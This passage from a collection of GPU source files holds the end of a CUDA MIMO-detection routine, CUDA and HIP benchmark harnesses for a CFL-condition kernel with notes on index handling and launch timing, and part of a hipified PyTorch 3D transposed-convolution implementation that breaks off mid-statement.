count2=0;count2<MATRIX_SIZE;count2++) // { // printf("%0.4f%+0.4f ", s_share_matrix[IDC2D(count1,count2,MATRIX_SIZE)].x, s_share_matrix[IDC2D(count1,count2,MATRIX_SIZE)].y); // } // printf("\n"); // } // error=cudaMemcpy(s_hat,d_s_hat,Nt*sizeof(cuComplex),cudaMemcpyDeviceToHost); // for(count1=0;count1<pathNum;count1++) // { // printf("the unconstrained estimation is:\n"); // for(int count2=0;count2<MATRIX_SIZE;count2++) // { // printf("%0.4f%+0.4fi ", s_hat[count2].x, s_hat[count2].y); // } // printf("\n"); // } printf("the s_kernel is :\n"); for(count1=0;count1<Nt;count1++) { printf("%0.4f%+0.4fi ", s_kernel[count1].x, s_kernel[count1].y); } printf("\n"); cudaFreeHost(s_sub_index); cudaFree(d_s_sub_index); // cudaFree(d_list); cudaFreeHost(Eu); cudaFree(d_Eu); cudaFreeHost(s_potential_matrix); cudaFree(d_s_potential_matrix); // cudaFree(d_psymbolconstellation); free(Eu_mini_index); // cudaFree(d_R); }
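A note on the candidate selection above: cublasIsamin returns a 1-based index of the entry with the smallest absolute value, which for the non-negative per-path Euclidean metrics in d_Eu is simply the smallest metric; that is why the host code subtracts one before reading the winning column of s_potential_matrix. The following minimal sketch isolates just that step; the metric values are made up and only standard CUDA/cuBLAS calls are used.

// Minimal sketch: pick the best path index from a device-side metric array.
#include <cstdio>
#include <cuda_runtime.h>
#include <cublas_v2.h>

int main() {
    const int pathNum = 4;                            // number of candidate paths (illustrative)
    float h_Eu[pathNum] = {3.2f, 0.7f, 5.1f, 2.4f};   // per-path Euclidean metrics (made up)

    float *d_Eu = nullptr;
    cudaMalloc(&d_Eu, pathNum * sizeof(float));
    cudaMemcpy(d_Eu, h_Eu, pathNum * sizeof(float), cudaMemcpyHostToDevice);

    cublasHandle_t handle;
    cublasCreate(&handle);

    int best = 0;                                     // cuBLAS writes a 1-based index here
    cublasIsamin(handle, pathNum, d_Eu, 1, &best);

    // Convert to the 0-based column index used when reading the candidate matrix.
    printf("minimum metric %f at path %d\n", h_Eu[best - 1], best - 1);

    cublasDestroy(handle);
    cudaFree(d_Eu);
    return 0;
}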
7e894159984ba9b466baaae8280d22a4b94c4862.hip
// !!! This is a file automatically generated by hipify!!!
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <getopt.h>
#include <hiprand/hiprand_kernel.h>
#include <stdlib.h>
#include <hip/hip_runtime.h>
#include <sys/time.h>
#include "ConditionCFLKernel2D3.cu"
#include <chrono>
#include <iostream>
using namespace std;
using namespace std::chrono;

int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}};
int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}};

int main(int argc, char **argv) {
    hipSetDevice(0);
    char *p;
    int matrix_len = strtol(argv[1], &p, 10);
    for (int matrix_looper = 0; matrix_looper < matrix_len; matrix_looper++) {
        for (int block_looper = 0; block_looper < 20; block_looper++) {
            int XSIZE = matrices_[matrix_looper][0], YSIZE = matrices_[matrix_looper][1];
            int BLOCKX = blocks_[block_looper][0], BLOCKY = blocks_[block_looper][1];

            // Device buffers hold XSIZE*YSIZE elements each.
            double *newDT = NULL;
            hipMalloc(&newDT, XSIZE * YSIZE * sizeof(double));
            double *DT2D = NULL;
            hipMalloc(&DT2D, XSIZE * YSIZE * sizeof(double));
            double *DT1D = NULL;
            hipMalloc(&DT1D, XSIZE * YSIZE * sizeof(double));
            double *Vmoy = NULL;
            hipMalloc(&Vmoy, XSIZE * YSIZE * sizeof(double));
            double *invRmed = NULL;
            hipMalloc(&invRmed, XSIZE * YSIZE * sizeof(double));
            int *CFL = NULL;
            hipMalloc(&CFL, XSIZE * YSIZE * sizeof(int));

            int nsec = 1;
            int nrad = 1;
            double DeltaT = 1;

            // Round the launch extent up to a multiple of the block dimensions.
            int iXSIZE = XSIZE;
            int iYSIZE = YSIZE;
            while (iXSIZE % BLOCKX != 0) {
                iXSIZE++;
            }
            while (iYSIZE % BLOCKY != 0) {
                iYSIZE++;
            }
            dim3 gridBlock(iXSIZE / BLOCKX, iYSIZE / BLOCKY);
            dim3 threadBlock(BLOCKX, BLOCKY);

            // One launch to set up the context, ten warm-up launches, then the timed runs.
            hipFree(0);
            hipLaunchKernelGGL((ConditionCFLKernel2D3), dim3(gridBlock), dim3(threadBlock), 0, 0, newDT, DT2D, DT1D, Vmoy, invRmed, CFL, nsec, nrad, DeltaT);
            hipDeviceSynchronize();
            for (int loop_counter = 0; loop_counter < 10; ++loop_counter) {
                hipLaunchKernelGGL((ConditionCFLKernel2D3), dim3(gridBlock), dim3(threadBlock), 0, 0, newDT, DT2D, DT1D, Vmoy, invRmed, CFL, nsec, nrad, DeltaT);
            }

            auto start = steady_clock::now();
            for (int loop_counter = 0; loop_counter < 1000; loop_counter++) {
                hipLaunchKernelGGL((ConditionCFLKernel2D3), dim3(gridBlock), dim3(threadBlock), 0, 0, newDT, DT2D, DT1D, Vmoy, invRmed, CFL, nsec, nrad, DeltaT);
            }
            auto end = steady_clock::now();
            auto usecs = duration_cast<duration<float, microseconds::period> >(end - start);
            cout << '[' << usecs.count() << ',' << '(' << BLOCKX << ',' << BLOCKY << ')' << ',' << '(' << XSIZE << ',' << YSIZE << ')' << ']' << endl;
        }
    }
}
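The two while loops in the harness above pad iXSIZE and iYSIZE up to the next multiple of the block dimensions before dividing, which is just a ceiling division. The sketch below shows the equivalent closed form; gridDimFor is a hypothetical helper name, not something the harness or kernel defines.

#include <cstdio>

// Smallest number of blocks of size `block` needed to cover `size` elements.
static unsigned int gridDimFor(unsigned int size, unsigned int block) {
    return (size + block - 1) / block;
}

int main() {
    // Matches the harness values: XSIZE = 240 with BLOCKX = 32 needs 8 blocks in x.
    printf("%u\n", gridDimFor(240, 32));   // prints 8
    return 0;
}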
7e894159984ba9b466baaae8280d22a4b94c4862.cu
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <getopt.h>
#include <curand_kernel.h>
#include <stdlib.h>
#include <cuda.h>
#include <sys/time.h>
#include "ConditionCFLKernel2D3.cu"
#include <chrono>
#include <iostream>
using namespace std;
using namespace std::chrono;

int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}};
int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}};

int main(int argc, char **argv) {
    cudaSetDevice(0);
    char *p;
    int matrix_len = strtol(argv[1], &p, 10);
    for (int matrix_looper = 0; matrix_looper < matrix_len; matrix_looper++) {
        for (int block_looper = 0; block_looper < 20; block_looper++) {
            int XSIZE = matrices_[matrix_looper][0], YSIZE = matrices_[matrix_looper][1];
            int BLOCKX = blocks_[block_looper][0], BLOCKY = blocks_[block_looper][1];

            // Device buffers hold XSIZE*YSIZE elements each.
            double *newDT = NULL;
            cudaMalloc(&newDT, XSIZE * YSIZE * sizeof(double));
            double *DT2D = NULL;
            cudaMalloc(&DT2D, XSIZE * YSIZE * sizeof(double));
            double *DT1D = NULL;
            cudaMalloc(&DT1D, XSIZE * YSIZE * sizeof(double));
            double *Vmoy = NULL;
            cudaMalloc(&Vmoy, XSIZE * YSIZE * sizeof(double));
            double *invRmed = NULL;
            cudaMalloc(&invRmed, XSIZE * YSIZE * sizeof(double));
            int *CFL = NULL;
            cudaMalloc(&CFL, XSIZE * YSIZE * sizeof(int));

            int nsec = 1;
            int nrad = 1;
            double DeltaT = 1;

            // Round the launch extent up to a multiple of the block dimensions.
            int iXSIZE = XSIZE;
            int iYSIZE = YSIZE;
            while (iXSIZE % BLOCKX != 0) {
                iXSIZE++;
            }
            while (iYSIZE % BLOCKY != 0) {
                iYSIZE++;
            }
            dim3 gridBlock(iXSIZE / BLOCKX, iYSIZE / BLOCKY);
            dim3 threadBlock(BLOCKX, BLOCKY);

            // One launch to set up the context, ten warm-up launches, then the timed runs.
            cudaFree(0);
            ConditionCFLKernel2D3<<<gridBlock, threadBlock>>>(newDT, DT2D, DT1D, Vmoy, invRmed, CFL, nsec, nrad, DeltaT);
            cudaDeviceSynchronize();
            for (int loop_counter = 0; loop_counter < 10; ++loop_counter) {
                ConditionCFLKernel2D3<<<gridBlock, threadBlock>>>(newDT, DT2D, DT1D, Vmoy, invRmed, CFL, nsec, nrad, DeltaT);
            }

            auto start = steady_clock::now();
            for (int loop_counter = 0; loop_counter < 1000; loop_counter++) {
                ConditionCFLKernel2D3<<<gridBlock, threadBlock>>>(newDT, DT2D, DT1D, Vmoy, invRmed, CFL, nsec, nrad, DeltaT);
            }
            auto end = steady_clock::now();
            auto usecs = duration_cast<duration<float, microseconds::period> >(end - start);
            cout << '[' << usecs.count() << ',' << '(' << BLOCKX << ',' << BLOCKY << ')' << ',' << '(' << XSIZE << ',' << YSIZE << ')' << ']' << endl;
        }
    }
}
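One caveat about the timing in both harness variants: the 1000 launches in the timed loop are asynchronous and nothing synchronizes afterwards, so steady_clock largely measures how quickly the launches are enqueued rather than how long the kernel actually runs. If device-side time is wanted, an event-based variant along the following lines could be used; dummyKernel is a stand-in, not the benchmarked kernel.

#include <cstdio>
#include <cuda_runtime.h>

__global__ void dummyKernel() {}   // placeholder for the kernel under test

int main() {
    cudaEvent_t start, stop;
    cudaEventCreate(&start);
    cudaEventCreate(&stop);

    cudaEventRecord(start);
    for (int i = 0; i < 1000; ++i) {
        dummyKernel<<<1, 64>>>();
    }
    cudaEventRecord(stop);
    cudaEventSynchronize(stop);        // wait until all 1000 launches have completed

    float ms = 0.0f;
    cudaEventElapsedTime(&ms, start, stop);
    printf("device time for 1000 launches: %f ms\n", ms);

    cudaEventDestroy(start);
    cudaEventDestroy(stop);
    return 0;
}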
ba8920157a70a1e6dfdae4fa3316bf8e001761cd.hip
// !!! This is a file automatically generated by hipify!!! #define TORCH_ASSERT_ONLY_METHOD_OPERATORS #include <ATen/core/Tensor.h> #include <ATen/AccumulateType.h> #include <ATen/Dispatch.h> #include <ATen/TensorUtils.h> #include <ATen/Utils.h> #include <ATen/hip/HIPBlas.h> #include <ATen/hip/HIPContext.h> #include <ATen/native/ConvUtils.h> #include <ATen/native/hip/vol2col.cuh> #ifndef AT_PER_OPERATOR_HEADERS #include <ATen/Functions.h> #include <ATen/NativeFunctions.h> #else #include <ATen/ops/empty.h> #include <ATen/ops/empty_like.h> #include <ATen/ops/sum.h> #include <ATen/ops/ones.h> #include <ATen/ops/slow_conv_transpose3d_native.h> #endif namespace at::native { namespace { static inline void slow_conv_transpose3d_shape_check( const Tensor& input, const Tensor& grad_output, const Tensor& weight, const Tensor& bias, int kernel_depth, int kernel_width, int kernel_height, int stride_depth, int stride_width, int stride_height, int padding_depth, int padding_width, int padding_height, int dilation_depth, int dilation_width, int dilation_height, int output_padding_depth, int output_padding_width, int output_padding_height, int weight_nullable) { TORCH_CHECK( input.numel() != 0 && (input.dim() == 4 || input.dim() == 5), "non-empty 4D or 5D (batch mode) tensor expected for input, but got: ", input.sizes()); TORCH_CHECK( stride_depth > 0 && stride_width > 0 && stride_height > 0, "stride should be greater than zero, but got stride_depth: ", stride_depth, " stride_height: ", stride_height, " stride_width: ", stride_width); TORCH_CHECK( dilation_depth > 0 && dilation_width > 0 && dilation_height > 0, "dilation should be greater than zero, but got dilation_depth: ", dilation_depth, ", dilation_height: ", dilation_height, ", dilation_width: ", dilation_width); TORCH_CHECK( (output_padding_depth < stride_depth || output_padding_depth < dilation_depth) && (output_padding_width < stride_width || output_padding_width < dilation_width) && (output_padding_height < stride_height || output_padding_height < dilation_height), "output padding must be smaller than either stride or dilation,", " but got output_padding_depth: ", output_padding_depth, " output_padding_height: ", output_padding_height, " output_padding_width: ", output_padding_width, " stride_depth: ", stride_depth, " stride_height: ", stride_height, " stride_width: ", stride_width, " dilation_depth: ", dilation_depth, " dilation_height: ", dilation_height, " dilation_width: ", dilation_width); // number of input & output planes and kernel size is indirectly defined by // the weight tensor if (weight.defined()) { TORCH_CHECK( weight.numel() != 0 && weight.dim() == 5, "non-empty 5D (n_output_plane x n_input_plane ", "x kernel_depth x kernel_height x kernel_width) tensor ", "expected for weight, but got: ", weight.sizes()); if (bias.defined()) { check_dim_size(bias, 1, 0, weight.size(1)); } } else if (!weight_nullable) { AT_ERROR("weight tensor is expected to be non-nullable"); } int ndim = input.dim(); int dimf = 0; int dimd = 1; int dimh = 2; int dimw = 3; if (ndim == 5) { dimf++; dimd++; dimh++; dimw++; } if (weight.defined()) { const int64_t n_input_plane = weight.size(0); check_dim_size(input, ndim, dimf, n_input_plane); } int64_t input_width = input.size(dimw); int64_t input_height = input.size(dimh); int64_t input_depth = input.size(dimd); int64_t output_depth = (input_depth - 1) * stride_depth - 2 * padding_depth + (dilation_depth * (kernel_depth - 1) + 1) + output_padding_depth; int64_t output_height = (input_height - 1) * stride_height - 
2 * padding_height + (dilation_height * (kernel_height - 1) + 1) + output_padding_height; int64_t output_width = (input_width - 1) * stride_width - 2 * padding_width + (dilation_width * (kernel_width - 1) + 1) + output_padding_width; if (output_depth < 1 || output_width < 1 || output_height < 1) { AT_ERROR( "Given input size per channel: (", input_depth, " x ", input_height, " x ", input_width, "). Calculated output size per channel: (", output_depth, " x ", output_height, " x ", output_width, "). Output size is too small"); } if (grad_output.defined()) { if (weight.defined()) { const int64_t n_output_plane = weight.size(1); check_dim_size(grad_output, ndim, dimf, n_output_plane); } else if (bias.defined()) { const int64_t n_output_plane = bias.size(0); check_dim_size(grad_output, ndim, dimf, n_output_plane); } check_dim_size(grad_output, ndim, dimd, output_depth); check_dim_size(grad_output, ndim, dimh, output_height); check_dim_size(grad_output, ndim, dimw, output_width); } } void slow_conv_transpose3d_out_cuda_template( Tensor& output, const Tensor& input_, const Tensor& weight_, IntArrayRef kernel_size, const Tensor& bias_, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation) { TORCH_CHECK( kernel_size.size() == 3, "It is expected kernel_size equals to 3, but got size ", kernel_size.size()); TORCH_CHECK( dilation.size() == 3, "It is expected dilation equals to 3, but got size ", dilation.size()); TORCH_CHECK( padding.size() == 3, "It is expected padding equals to 3, but got size ", padding.size()); TORCH_CHECK( stride.size() == 3, "It is expected stride equals to 3, but got size ", stride.size()); TORCH_CHECK( output_padding.size() == 3, "It is expected stride equals to 3, but got size ", output_padding.size()); int64_t kernel_depth = kernel_size[0]; int64_t kernel_height = kernel_size[1]; int64_t kernel_width = kernel_size[2]; int64_t dilation_depth = dilation[0]; int64_t dilation_height = dilation[1]; int64_t dilation_width = dilation[2]; int64_t padding_depth = padding[0]; int64_t padding_height = padding[1]; int64_t padding_width = padding[2]; int64_t stride_depth = stride[0]; int64_t stride_height = stride[1]; int64_t stride_width = stride[2]; int64_t output_padding_depth = output_padding[0]; int64_t output_padding_height = output_padding[1]; int64_t output_padding_width = output_padding[2]; int n_input_plane = weight_.size(0); int n_output_plane = weight_.size(1); TensorArg input_arg{input_, "input", 1}, output_arg{output, "output", 2}, weight_arg{weight_, "weight", 3}, bias_arg{bias_, "bias", 4}; checkAllSameGPU( "slow_conv_transpose3d_out_cuda", {input_arg, output_arg, weight_arg, bias_arg}); slow_conv_transpose3d_shape_check( input_, Tensor(), weight_, bias_, kernel_depth, kernel_width, kernel_height, stride_depth, stride_width, stride_height, padding_depth, padding_width, padding_height, dilation_depth, dilation_width, dilation_height, output_padding_depth, output_padding_width, output_padding_height, 0); Tensor input = input_.contiguous(); Tensor weight = weight_.contiguous(); Tensor bias = bias_.defined() ? 
bias_.contiguous() : bias_; int is_batch = false; if (input.dim() == 4) { // Force batch is_batch = true; input.resize_( {1, input.size(0), input.size(1), input.size(2), input.size(3)}); } int64_t input_width = input.size(4); int64_t input_height = input.size(3); int64_t input_depth = input.size(2); int64_t output_depth = (input_depth - 1) * stride_depth - 2 * padding_depth + (dilation_depth * (kernel_depth - 1) + 1) + output_padding_depth; int64_t output_height = (input_height - 1) * stride_height - 2 * padding_height + (dilation_height * (kernel_height - 1) + 1) + output_padding_height; int64_t output_width = (input_width - 1) * stride_width - 2 * padding_width + (dilation_width * (kernel_width - 1) + 1) + output_padding_width; // Batch size + input planes int64_t batch_size = input.size(0); // Resize output output.resize_( {batch_size, n_output_plane, output_depth, output_height, output_width}); // Create temporary columns Tensor columns = at::empty({n_output_plane * kernel_width * kernel_height * kernel_depth, input_depth * input_height * input_width}, input.options()); // Define a buffer of ones, for bias accumulation Tensor ones = bias.defined() ? at::ones({output_depth, output_height, output_width}, input_.options()) : Tensor(); AT_DISPATCH_FLOATING_TYPES_AND2(kHalf, kBFloat16, input.scalar_type(), "slow_conv_transpose3d_out_cuda", [&] { using accscalar_t = at::acc_type<scalar_t, true>; // Helpers Tensor input_n; Tensor output_n; // For each elt in batch, do: for (int elt = 0; elt < batch_size; elt++) { // Matrix mulitply per output: input_n = input.select(0, elt); output_n = output.select(0, elt); // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t m = weight.size(1) * weight.size(2) * weight.size(3) * weight.size(4); int64_t n = columns.size(1); int64_t k = weight.size(0); // Do GEMM (note: this is a bit confusing because gemm assumes // column-major matrices) at::cuda::blas::gemm<scalar_t>( 'n', 't', n, m, k, static_cast<scalar_t>(1), input_n.const_data_ptr<scalar_t>(), n, weight.const_data_ptr<scalar_t>(), m, static_cast<scalar_t>(0), columns.mutable_data_ptr<scalar_t>(), n); // Unpack columns back into input: at::native::col2vol<scalar_t, accscalar_t>( at::hip::getCurrentHIPStreamMasqueradingAsCUDA(), columns.const_data_ptr<scalar_t>(), n_output_plane, output_depth, output_height, output_width, input_depth, input_height, input_width, kernel_depth, kernel_height, kernel_width, padding_depth, padding_height, padding_width, stride_depth, stride_height, stride_width, dilation_depth, dilation_height, dilation_width, output_n.mutable_data_ptr<scalar_t>()); // Do Bias after: // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t m_ = n_output_plane; int64_t n_ = output_depth * output_height * output_width; int64_t k_ = 1; // Do GEMM (note: this is a bit confusing because gemm assumes // column-major matrices) if (bias.defined()) { at::cuda::blas::gemm<scalar_t>( 't', 'n', n_, m_, k_, static_cast<scalar_t>(1), ones.const_data_ptr<scalar_t>(), k_, bias.const_data_ptr<scalar_t>(), k_, static_cast<scalar_t>(1), output_n.mutable_data_ptr<scalar_t>(), n_); } } // Resize output if (is_batch) { output.resize_( {n_output_plane, output_depth, output_height, output_width}); input.resize_( {n_input_plane, input_depth, input_height, input_width}); } }); } void slow_conv_transpose3d_backward_out_cuda_template( const Tensor& input_, const Tensor& grad_output_, Tensor& grad_input, const 
Tensor& weight_, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation) { TORCH_CHECK( kernel_size.size() == 3, "It is expected kernel_size equals to 3, but got size ", kernel_size.size()); TORCH_CHECK( dilation.size() == 3, "It is expected dilation equals to 3, but got size ", dilation.size()); TORCH_CHECK( padding.size() == 3, "It is expected padding equals to 3, but got size ", padding.size()); TORCH_CHECK( stride.size() == 3, "It is expected stride equals to 3, but got size ", stride.size()); TORCH_CHECK( output_padding.size() == 3, "It is expected stride equals to 3, but got size ", output_padding.size()); int n_input_plane = weight_.size(0); int n_output_plane = weight_.size(1); int64_t kernel_depth = kernel_size[0]; int64_t kernel_height = kernel_size[1]; int64_t kernel_width = kernel_size[2]; int64_t dilation_depth = dilation[0]; int64_t dilation_height = dilation[1]; int64_t dilation_width = dilation[2]; int64_t padding_depth = padding[0]; int64_t padding_height = padding[1]; int64_t padding_width = padding[2]; int64_t stride_depth = stride[0]; int64_t stride_height = stride[1]; int64_t stride_width = stride[2]; int64_t output_padding_depth = output_padding[0]; int64_t output_padding_height = output_padding[1]; int64_t output_padding_width = output_padding[2]; TensorArg input_arg{input_, "input", 1}, grad_output_arg{grad_output_, "grad_output", 2}, weight_arg{weight_, "weight", 3}, grad_input_arg{grad_input, "grad_input", 4}; checkAllSameGPU( "slow_conv_transpose3d_backward_out_cuda", {input_arg, grad_output_arg, weight_arg, grad_input_arg}); slow_conv_transpose3d_shape_check( input_, grad_output_, weight_, Tensor(), kernel_depth, kernel_width, kernel_height, stride_depth, stride_width, stride_height, padding_depth, padding_width, padding_height, dilation_depth, dilation_width, dilation_height, output_padding_depth, output_padding_width, output_padding_height, 0); Tensor input = input_.contiguous(); Tensor grad_output = grad_output_.contiguous(); Tensor weight = weight_.contiguous(); bool is_batch = false; if (input.dim() == 4) { // Force batch is_batch = true; input.resize_( {1, input.size(0), input.size(1), input.size(2), input.size(3)}); grad_output.resize_({1, grad_output.size(0), grad_output.size(1), grad_output.size(2), grad_output.size(3)}); } int64_t input_width = input.size(4); int64_t input_height = input.size(3); int64_t input_depth = input.size(2); int64_t output_depth = (input_depth - 1) * stride_depth - 2 * padding_depth + (dilation_depth * (kernel_depth - 1) + 1) + output_padding_depth; int64_t output_height = (input_height - 1) * stride_height - 2 * padding_height + (dilation_height * (kernel_height - 1) + 1) + output_padding_height; int64_t output_width = (input_width - 1) * stride_width - 2 * padding_width + (dilation_width * (kernel_width - 1) + 1) + output_padding_width; // Batch size + input planes int64_t batch_size = input.size(0); // Resize output grad_input.resize_( {batch_size, n_input_plane, input_depth, input_height, input_width}); // Create temporary columns bool need_columns = (kernel_depth != 1 || kernel_height != 1 || kernel_width != 1 || stride_depth != 1 || stride_height != 1 || stride_width != 1 || dilation_depth != 1 || dilation_height != 1 || dilation_width != 1 || padding_depth != 0 || padding_height != 0 || padding_width != 0); Tensor grad_columns = need_columns ? 
at::empty({n_output_plane * kernel_width * kernel_height * kernel_depth, input_depth * input_height * input_width}, input.options()) : Tensor(); AT_DISPATCH_FLOATING_TYPES_AND2(kHalf, kBFloat16, input.scalar_type(), "slow_conv_transpose3d_backward_out_cuda", [&] { // Helpers Tensor grad_input_n; Tensor grad_output_n; // For each elt in batch, do: for (int elt = 0; elt < batch_size; elt++) { // Matrix mulitply per sample: grad_input_n = grad_input.select(0, elt); grad_output_n = grad_output.select(0, elt); if (need_columns) { // Extract columns: at::native::vol2col<scalar_t>( at::hip::getCurrentHIPStreamMasqueradingAsCUDA(), grad_output_n.const_data_ptr<scalar_t>(), n_output_plane, output_depth, output_height, output_width, input_depth, input_height, input_width, kernel_depth, kernel_height, kernel_width, padding_depth, padding_height, padding_width, stride_depth, stride_height, stride_width, dilation_depth, dilation_height, dilation_width, grad_columns.mutable_data_ptr<scalar_t>()); } // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t m = weight.size(0); int64_t n = input_depth * input_height * input_width; int64_t k = weight.size(1) * weight.size(2) * weight.size(3) * weight.size(4); // Do GEMM (note: this is a bit confusing because gemm assumes // column-major matrices) auto gemm_in_ptr = need_columns ? grad_columns.const_data_ptr<scalar_t>() : grad_output_n.const_data_ptr<scalar_t>(); at::cuda::blas::gemm<scalar_t>( 'n', 'n', n, m, k, static_cast<scalar_t>(1), gemm_in_ptr, n, weight.const_data_ptr<scalar_t>(), k, static_cast<scalar_t>(0), grad_input_n.mutable_data_ptr<scalar_t>(), n); } // Resize output if (is_batch) { grad_output.resize_( {n_output_plane, output_depth, output_height, output_width}); input.resize_( {n_input_plane, input_depth, input_height, input_width}); grad_input.resize_( {n_input_plane, input_depth, input_height, input_width}); } }); } void slow_conv_transpose3d_acc_grad_parameters_cuda( const Tensor& input_, const Tensor& grad_output_, Tensor& grad_weight, Tensor& grad_bias, IntArrayRef kernel_size, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation, int scale_) { TORCH_CHECK( kernel_size.size() == 3, "It is expected kernel_size equals to 3, but got size ", kernel_size.size()); TORCH_CHECK( dilation.size() == 3, "It is expected dilation equals to 3, but got size ", dilation.size()); TORCH_CHECK( padding.size() == 3, "It is expected padding equals to 3, but got size ", padding.size()); TORCH_CHECK( stride.size() == 3, "It is expected stride equals to 3, but got size ", stride.size()); TORCH_CHECK( output_padding.size() == 3, "It is expected stride equals to 3, but got size ", output_padding.size()); int64_t kernel_depth = kernel_size[0]; int64_t kernel_height = kernel_size[1]; int64_t kernel_width = kernel_size[2]; int64_t dilation_depth = dilation[0]; int64_t dilation_height = dilation[1]; int64_t dilation_width = dilation[2]; int64_t padding_depth = padding[0]; int64_t padding_height = padding[1]; int64_t padding_width = padding[2]; int64_t stride_depth = stride[0]; int64_t stride_height = stride[1]; int64_t stride_width = stride[2]; int64_t output_padding_depth = output_padding[0]; int64_t output_padding_height = output_padding[1]; int64_t output_padding_width = output_padding[2]; TensorArg input_arg{input_, "input", 1}, grad_output_arg{grad_output_, "grad_output", 2}, grad_weight_arg{grad_weight, "grad_weight", 3}, grad_bias_arg{grad_bias, "grad_bias", 4}; 
checkAllSameGPU( "slow_conv_transpose3d_acc_grad_parameters_cuda", {input_arg, grad_output_arg, grad_weight_arg, grad_bias_arg}); slow_conv_transpose3d_shape_check( input_, grad_output_, grad_weight, grad_bias, kernel_depth, kernel_width, kernel_height, stride_depth, stride_width, stride_height, padding_depth, padding_width, padding_height, dilation_depth, dilation_width, dilation_height, output_padding_depth, output_padding_width, output_padding_height, 1); int n_output_plane; if (grad_weight.defined()) { n_output_plane = grad_weight.size(1); } else if (grad_bias.defined()) { n_output_plane = grad_bias.size(0); } else { return; } if (grad_weight.defined()) { TORCH_CHECK( grad_weight.is_contiguous(), "grad_weight needs to be contiguous"); } if (grad_bias.defined()) { TORCH_CHECK(grad_bias.is_contiguous(), "grad_bias needs to be contiguous"); } Tensor input = input_.contiguous(); Tensor grad_output = grad_output_.contiguous(); bool is_batch = false; if (input.dim() == 4) { // Force batch is_batch = true; input.resize_( {1, input.size(0), input.size(1), input.size(2), input.size(3)}); grad_output.resize_({1, grad_output.size(0), grad_output.size(1), grad_output.size(2), grad_output.size(3)}); } int64_t input_width = input.size(4); int64_t input_height = input.size(3); int64_t input_depth = input.size(2); int64_t output_depth = (input_depth - 1) * stride_depth - 2 * padding_depth + (dilation_depth * (kernel_depth - 1) + 1) + output_padding_depth; int64_t output_height = (input_height - 1) * stride_height - 2 * padding_height + (dilation_height * (kernel_height - 1) + 1) + output_padding_height; int64_t output_width = (input_width - 1) * stride_width - 2 * padding_width + (dilation_width * (kernel_width - 1) + 1) + output_padding_width; // Batch size + input planes int64_t batch_size = input.size(0); // Create temporary columns bool need_columns = (kernel_depth != 1 || kernel_height != 1 || kernel_width != 1 || stride_depth != 1 || stride_height != 1 || stride_width != 1 || dilation_depth != 1 || dilation_height != 1 || dilation_width != 1 || padding_depth != 0 || padding_height != 0 || padding_width != 0); Tensor columns = need_columns ? 
at::empty({n_output_plane * kernel_width * kernel_height * kernel_depth, input_depth * input_height * input_width}, input.options()) : Tensor(); AT_DISPATCH_FLOATING_TYPES_AND2(kHalf, kBFloat16, input.scalar_type(), "slow_conv_transpose3d_acc_grad_parameters_cuda", [&] { // Helpers Tensor input_n; Tensor grad_output_n; scalar_t scale = static_cast<scalar_t>(scale_); // For each elt in batch, do: for (int elt = 0; elt < batch_size; elt++) { // Matrix mulitply per output: grad_output_n = grad_output.select(0, elt); // Do Weight: if (grad_weight.defined()) { // Matrix mulitply per output: input_n = input.select(0, elt); if (need_columns) { // Extract columns: at::native::vol2col<scalar_t>( at::hip::getCurrentHIPStreamMasqueradingAsCUDA(), grad_output_n.const_data_ptr<scalar_t>(), n_output_plane, output_depth, output_height, output_width, input_depth, input_height, input_width, kernel_depth, kernel_height, kernel_width, padding_depth, padding_height, padding_width, stride_depth, stride_height, stride_width, dilation_depth, dilation_height, dilation_width, columns.mutable_data_ptr<scalar_t>()); } // M,N,K are dims of matrix A and B // (see http://docs.nvidia.com/cuda/cublas/#cublas-lt-t-gt-gemm) int64_t n = n_output_plane * kernel_width * kernel_height * kernel_depth; int64_t m = input_n.size(0); // n_input_plane int64_t k = input_depth * input_height * input_width; // Do GEMM (note: this is a bit confusing because gemm assumes // column-major matrices) auto gemm_in_ptr = need_columns ? columns.const_data_ptr<scalar_t>() : grad_output_n.const_data_ptr<scalar_t>(); at::cuda::blas::gemm<scalar_t>( 't', 'n', n, m, k, scale, gemm_in_ptr, k, input_n.const_data_ptr<scalar_t>(), k, static_cast<scalar_t>(1), grad_weight.mutable_data_ptr<scalar_t>(), n); } } if (grad_bias.defined()) { at::sum_out(grad_bias, grad_output, IntArrayRef{0, 2, 3, 4}); } // Resize if (is_batch) { grad_output.resize_( {n_output_plane, output_depth, output_height, output_width}); input.resize_( {input.size(1), input_depth, input_height, input_width}); } }); } } // namespace Tensor& slow_conv_transpose3d_out_cuda(const Tensor& input, const Tensor& weight, IntArrayRef kernel_size, const c10::optional<Tensor>& bias_opt, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation, Tensor& output) { // See [Note: hacky wrapper removal for optional tensor] c10::MaybeOwned<Tensor> bias_maybe_owned = at::borrow_from_optional_tensor(bias_opt); const Tensor& bias = *bias_maybe_owned; slow_conv_transpose3d_out_cuda_template( output, input, weight, kernel_size, bias, stride, padding, output_padding, dilation); return output; } Tensor slow_conv_transpose3d_cuda( const Tensor& input, const Tensor& weight, IntArrayRef kernel_size, const c10::optional<Tensor>& bias_opt, IntArrayRef stride, IntArrayRef padding, IntArrayRef output_padding, IntArrayRef dilation) { // See [Note: hacky wrapper removal for optional tensor] c10::MaybeOwned<Tensor> bias_maybe_owned = 